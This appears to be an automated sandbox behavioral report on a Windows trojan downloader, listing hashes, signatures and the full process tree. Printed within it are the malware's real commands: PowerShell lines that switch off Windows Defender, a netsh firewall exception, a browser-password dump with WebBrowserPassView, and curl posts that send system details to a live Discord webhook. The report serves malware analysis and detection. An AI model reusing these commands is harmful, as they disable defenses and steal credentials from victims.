Analysis
-
max time kernel
151s -
max time network
153s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
21-03-2021 17:36
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe
Resource
win7v20201028
General
-
Target
SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe
-
Size
12.6MB
-
MD5
897aabd3ac16050d62b8aacf85541454
-
SHA1
db2fd7fb1de3b602d7ba17da0d0b1ad4f6e552c9
-
SHA256
1d2ca907c73941dfcd91aa2ef0b96ecc137146be0dfd654e52f9408100f8fbbb
-
SHA512
10bc9fcb25e2991141fe279a7815c59f06b0213046f957b4637dcfd9c31473a7b7428db5844fe0f7a36c0320ca933f335d7edea5167d8960ad37e1f0860f200a
Malware Config
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral2/files/0x0002000000015616-10.dat disable_win_def -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/files/0x000100000001aba0-384.dat WebBrowserPassView behavioral2/files/0x000100000001aba0-386.dat WebBrowserPassView -
Nirsoft 2 IoCs
resource yara_rule behavioral2/files/0x000100000001aba0-384.dat Nirsoft behavioral2/files/0x000100000001aba0-386.dat Nirsoft -
Executes dropped EXE 7 IoCs
pid Process 3404 Machos1.exe 184 System.exe 3472 curl.exe 3084 curl.exe 5076 WebBrowserPassView.exe 4132 curl.exe 3860 filed.exe -
Modifies Windows Firewall 1 TTPs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\daa2ebaeb88e49d9128a4fc7e89de43f = "\"C:\\Windows\\System.exe\" .." System.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\daa2ebaeb88e49d9128a4fc7e89de43f = "\"C:\\Windows\\System.exe\" .." System.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 27 myexternalip.com 31 myexternalip.com -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Disable.vbs SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe File created C:\Windows\Machos1.exe SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe File created C:\Windows\System.exe SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
pid Process 2276 timeout.exe -
Gathers system information 1 TTPs 8 IoCs
Runs systeminfo.exe.
pid Process 4240 systeminfo.exe 588 systeminfo.exe 2100 systeminfo.exe 1704 systeminfo.exe 3312 systeminfo.exe 4440 systeminfo.exe 4588 systeminfo.exe 1184 systeminfo.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings Machos1.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings WScript.exe -
Suspicious behavior: EnumeratesProcesses 48 IoCs
pid Process 2240 powershell.exe 2240 powershell.exe 2116 powershell.exe 2116 powershell.exe 388 powershell.exe 388 powershell.exe 3940 powershell.exe 3940 powershell.exe 3160 powershell.exe 3160 powershell.exe 752 powershell.exe 752 powershell.exe 3956 powershell.exe 3956 powershell.exe 1944 powershell.exe 1944 powershell.exe 2128 powershell.exe 2128 powershell.exe 4112 powershell.exe 4112 powershell.exe 1968 powershell.exe 1968 powershell.exe 3940 powershell.exe 388 powershell.exe 2116 powershell.exe 2240 powershell.exe 3160 powershell.exe 3956 powershell.exe 752 powershell.exe 1944 powershell.exe 2128 powershell.exe 4112 powershell.exe 1968 powershell.exe 388 powershell.exe 2240 powershell.exe 3160 powershell.exe 2116 powershell.exe 3940 powershell.exe 3956 powershell.exe 752 powershell.exe 1944 powershell.exe 2128 powershell.exe 4112 powershell.exe 1968 powershell.exe 5076 WebBrowserPassView.exe 5076 WebBrowserPassView.exe 5076 WebBrowserPassView.exe 5076 WebBrowserPassView.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3404 Machos1.exe Token: SeDebugPrivilege 2240 powershell.exe Token: SeDebugPrivilege 2116 powershell.exe Token: SeDebugPrivilege 388 powershell.exe Token: SeDebugPrivilege 3940 powershell.exe Token: SeDebugPrivilege 3160 powershell.exe Token: SeDebugPrivilege 752 powershell.exe Token: SeDebugPrivilege 3956 powershell.exe Token: SeDebugPrivilege 1944 powershell.exe Token: SeDebugPrivilege 2128 powershell.exe Token: SeDebugPrivilege 4112 powershell.exe Token: SeDebugPrivilege 1968 powershell.exe Token: SeDebugPrivilege 184 System.exe Token: 33 184 System.exe Token: SeIncBasePriorityPrivilege 184 System.exe Token: 33 184 System.exe Token: SeIncBasePriorityPrivilege 184 System.exe Token: 33 184 System.exe Token: SeIncBasePriorityPrivilege 184 System.exe Token: 33 184 System.exe Token: SeIncBasePriorityPrivilege 184 System.exe Token: 33 184 System.exe Token: SeIncBasePriorityPrivilege 184 System.exe Token: 33 184 System.exe Token: SeIncBasePriorityPrivilege 184 System.exe Token: 33 184 System.exe Token: SeIncBasePriorityPrivilege 184 System.exe Token: SeIncreaseQuotaPrivilege 2268 WMIC.exe Token: SeSecurityPrivilege 2268 WMIC.exe Token: SeTakeOwnershipPrivilege 2268 WMIC.exe Token: SeLoadDriverPrivilege 2268 WMIC.exe Token: SeSystemProfilePrivilege 2268 WMIC.exe Token: SeSystemtimePrivilege 2268 WMIC.exe Token: SeProfSingleProcessPrivilege 2268 WMIC.exe Token: SeIncBasePriorityPrivilege 2268 WMIC.exe Token: SeCreatePagefilePrivilege 2268 WMIC.exe Token: SeBackupPrivilege 2268 WMIC.exe Token: SeRestorePrivilege 2268 WMIC.exe Token: SeShutdownPrivilege 2268 WMIC.exe Token: SeDebugPrivilege 2268 WMIC.exe Token: SeSystemEnvironmentPrivilege 2268 WMIC.exe Token: SeRemoteShutdownPrivilege 2268 WMIC.exe Token: SeUndockPrivilege 2268 WMIC.exe Token: SeManageVolumePrivilege 2268 WMIC.exe Token: 33 2268 WMIC.exe Token: 34 2268 WMIC.exe Token: 35 2268 WMIC.exe Token: 36 2268 WMIC.exe Token: SeIncreaseQuotaPrivilege 2268 WMIC.exe Token: SeSecurityPrivilege 2268 WMIC.exe Token: SeTakeOwnershipPrivilege 2268 WMIC.exe Token: SeLoadDriverPrivilege 2268 WMIC.exe Token: SeSystemProfilePrivilege 2268 WMIC.exe Token: SeSystemtimePrivilege 2268 WMIC.exe Token: SeProfSingleProcessPrivilege 2268 WMIC.exe Token: SeIncBasePriorityPrivilege 2268 WMIC.exe Token: SeCreatePagefilePrivilege 2268 WMIC.exe Token: SeBackupPrivilege 2268 WMIC.exe Token: SeRestorePrivilege 2268 WMIC.exe Token: SeShutdownPrivilege 2268 WMIC.exe Token: SeDebugPrivilege 2268 WMIC.exe Token: SeSystemEnvironmentPrivilege 2268 WMIC.exe Token: SeRemoteShutdownPrivilege 2268 WMIC.exe Token: SeUndockPrivilege 2268 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 644 wrote to memory of 2924 644 SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe 75 PID 644 wrote to memory of 2924 644 SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe 75 PID 644 wrote to memory of 2924 644 SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe 75 PID 644 wrote to memory of 3404 644 SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe 76 PID 644 wrote to memory of 3404 644 SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe 76 PID 644 wrote to memory of 184 644 SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe 77 PID 644 wrote to memory of 184 644 SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe 77 PID 644 wrote to memory of 184 644 SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe 77 PID 2924 wrote to memory of 1520 2924 WScript.exe 78 PID 2924 wrote to memory of 1520 2924 WScript.exe 78 PID 2924 wrote to memory of 1520 2924 WScript.exe 78 PID 1520 wrote to memory of 388 1520 WScript.exe 79 PID 1520 wrote to memory of 388 1520 WScript.exe 79 PID 1520 wrote to memory of 388 1520 WScript.exe 79 PID 1520 wrote to memory of 2116 1520 WScript.exe 80 PID 1520 wrote to memory of 2116 1520 WScript.exe 80 PID 1520 wrote to memory of 2116 1520 WScript.exe 80 PID 1520 wrote to memory of 2240 1520 WScript.exe 83 PID 1520 wrote to memory of 2240 1520 WScript.exe 83 PID 1520 wrote to memory of 2240 1520 WScript.exe 83 PID 1520 wrote to memory of 3940 1520 WScript.exe 85 PID 1520 wrote to memory of 3940 1520 WScript.exe 85 PID 1520 wrote to memory of 3940 1520 WScript.exe 85 PID 1520 wrote to memory of 3956 1520 WScript.exe 87 PID 1520 wrote to memory of 3956 1520 WScript.exe 87 PID 1520 wrote to memory of 3956 1520 WScript.exe 87 PID 1520 wrote to memory of 3160 1520 WScript.exe 89 PID 1520 wrote to memory of 3160 1520 WScript.exe 89 PID 1520 wrote to memory of 3160 1520 WScript.exe 89 PID 1520 wrote to memory of 752 1520 WScript.exe 90 PID 1520 wrote to memory of 752 1520 WScript.exe 90 PID 1520 wrote to memory of 752 1520 WScript.exe 90 PID 1520 wrote to memory of 1944 1520 WScript.exe 98 PID 1520 wrote to memory of 1944 1520 WScript.exe 98 PID 1520 wrote to memory of 1944 1520 WScript.exe 98 PID 1520 wrote to memory of 2128 1520 WScript.exe 97 PID 1520 wrote to memory of 2128 1520 WScript.exe 97 PID 1520 wrote to memory of 2128 1520 WScript.exe 97 PID 1520 wrote to memory of 1968 1520 WScript.exe 95 PID 1520 wrote to memory of 1968 1520 WScript.exe 95 PID 1520 wrote to memory of 1968 1520 WScript.exe 95 PID 1520 wrote to memory of 4112 1520 WScript.exe 92 PID 1520 wrote to memory of 4112 1520 WScript.exe 92 PID 1520 wrote to memory of 4112 1520 WScript.exe 92 PID 3404 wrote to memory of 4900 3404 Machos1.exe 101 PID 3404 wrote to memory of 4900 3404 Machos1.exe 101 PID 4900 wrote to memory of 756 4900 WScript.exe 102 PID 4900 wrote to memory of 756 4900 WScript.exe 102 PID 756 wrote to memory of 4436 756 WScript.exe 103 PID 756 wrote to memory of 4436 756 WScript.exe 103 PID 184 wrote to memory of 4760 184 System.exe 105 PID 184 wrote to memory of 4760 184 System.exe 105 PID 184 wrote to memory of 4760 184 System.exe 105 PID 4436 wrote to memory of 3472 4436 cmd.exe 107 PID 4436 wrote to memory of 3472 4436 cmd.exe 107 PID 4436 wrote to memory of 3084 4436 cmd.exe 108 PID 4436 wrote to memory of 3084 4436 cmd.exe 108 PID 4436 wrote to memory of 5076 4436 cmd.exe 109 PID 4436 wrote to memory of 5076 4436 cmd.exe 109 PID 4436 wrote to memory of 5076 4436 cmd.exe 109 PID 4436 wrote to memory of 3312 4436 cmd.exe 110 PID 4436 wrote to memory of 3312 4436 cmd.exe 110 PID 4436 wrote to memory of 3668 4436 cmd.exe 111 PID 4436 wrote to memory of 3668 4436 cmd.exe 111
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader38.3828.25697.12964.exe"1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\Disable.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\SysWOW64\WScript.exe" "C:\Windows\Disable.vbs" /elevate3⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:388
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3956
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3160
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:752
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 64⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4112
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 64⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
-
-
-
C:\Windows\Machos1.exe"C:\Windows\Machos1.exe"2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3404 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\temp\finalres.vbs"3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\temp\finalres2.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\temp\finalres.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\temp\curl.exeC:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**Hey Machos. Extraction was successful.**\"}" https://discordapp.com/api/webhooks/812010029556432946/cR78AVIHBOdzVZKLTZyxTYPyO8Zxl7AHlImj-qXIF6Ue767lT1m1Gsek0tpc8FRIm7sC6⤵
- Executes dropped EXE
PID:3472
-
-
C:\temp\curl.exeC:/temp/curl "https://myexternalip.com/raw"6⤵
- Executes dropped EXE
PID:3084
-
-
C:\temp\WebBrowserPassView.exeC:/temp/WebBrowserPassView.exe /stext "C:/temp/Admin_Passwords.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5076
-
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:3312
-
-
C:\Windows\system32\findstr.exefindstr /c:"Host Name"6⤵PID:3668
-
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:4440
-
-
C:\Windows\system32\findstr.exefindstr /c:"Domain"6⤵PID:4860
-
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:4588
-
-
C:\Windows\system32\findstr.exefindstr /c:"OS Name"6⤵PID:4248
-
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:1184
-
-
C:\Windows\system32\findstr.exefindstr /c:"OS Version"6⤵PID:3156
-
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:4240
-
-
C:\Windows\system32\findstr.exefindstr /c:"System Manufacturer"6⤵PID:5056
-
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:588
-
-
C:\Windows\system32\findstr.exefindstr /c:"System Model"6⤵PID:4220
-
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:2100
-
-
C:\Windows\system32\findstr.exefindstr /c:"System type"6⤵PID:4576
-
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:1704
-
-
C:\Windows\system32\findstr.exefindstr /c:"Total Physical Memory"6⤵PID:1680
-
-
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get size6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get serialnumber6⤵PID:3356
-
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name6⤵PID:2544
-
-
C:\temp\curl.exeC:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**Admin**\n```asciidoc\nTime and Date :: Sun 03/21/2021 18:41:05.86\nIP Address :: 154.61.71.13\nWindows Info :: Product Name: Windows 10 Pro, Product ID: 00331-10000-00001-AA148, Installed Key: W269N-WFGWX-YVC9B-4J6C9-T83GX\n```\n\"}" https://discordapp.com/api/webhooks/812010029556432946/cR78AVIHBOdzVZKLTZyxTYPyO8Zxl7AHlImj-qXIF6Ue767lT1m1Gsek0tpc8FRIm7sC6⤵
- Executes dropped EXE
PID:4132
-
-
C:\temp\filed.exe"C:\temp\filed.exe" --processStart filed.exe6⤵
- Executes dropped EXE
PID:3860
-
-
C:\Windows\system32\timeout.exetimeout 56⤵
- Delays execution with timeout.exe
PID:2276
-
-
-
-
-
-
C:\Windows\System.exe"C:\Windows\System.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:184 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\System.exe" "System.exe" ENABLE3⤵PID:4760
-
-